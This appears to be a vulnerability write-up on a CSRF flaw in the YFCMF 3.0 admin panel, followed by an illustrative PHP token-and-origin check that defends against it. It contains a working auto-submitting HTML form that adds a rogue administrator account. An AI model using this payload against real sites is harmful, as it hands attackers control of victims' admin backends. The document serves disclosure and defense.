CSRF in YFCMF 3.0

Description

The add-administrator page in the admin backend is vulnerable to CSRF, which allows other administrator accounts to be added.

PoC

<html>
    <form action="/YFCMF/admin/admin/adminsave.html" method="post">
        <select name="group_id" required="">
            <option value="2"/>
        </select>
        <input name="username" value="csrf" type="hidden"/>
        <input name="password" value="123" type="hidden"/>
        <input name="email" value="csrf@1.com" type="hidden"/>
        <input name="realname" value="csrf" type="hidden"/>
    </form>
    <script>
        document.forms[0].submit();
    </script>
</html>

Reproduction

1. View the original users

2. Visit the constructed CSRF page

3. The account is added successfully
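
The PoC works because the adminsave request is accepted with nothing but the administrator's session cookie. The following is an added example, not YFCMF's own code, of a guard a handler like this can call before saving: it rejects cross-origin POSTs and requires a session-bound token. The function names, the `csrf_token` field name and the host names are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers, not YFCMF APIs.

/** Return the per-session token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True only for a same-origin POST that carries the session's token. */
function csrf_check(array $server, array $post, array $session, string $siteHost): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // Browsers send Origin on cross-site form POSTs; fall back to Referer.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source !== '') {
        $host = parse_url($source, PHP_URL_HOST);
        if (!is_string($host) || strcasecmp($host, $siteHost) !== 0) {
            return false;
        }
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // hash_equals compares in constant time.
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

// Constructed demo: the PoC's request (foreign Origin, no token) and a legitimate one.
$session = [];
$token = csrf_token($session);
$forged = csrf_check(
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example'],
    ['username' => 'csrf', 'password' => '123', 'group_id' => '2'],
    $session, 'cms.example');
$legit = csrf_check(
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://cms.example'],
    ['username' => 'alice', 'csrf_token' => $token],
    $session, 'cms.example');
var_dump($forged, $legit);
```

In a real handler the arguments would be `$_SERVER`, `$_POST` and `$_SESSION`, and the add-administrator form would embed the value of `csrf_token($_SESSION)` in a hidden field.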
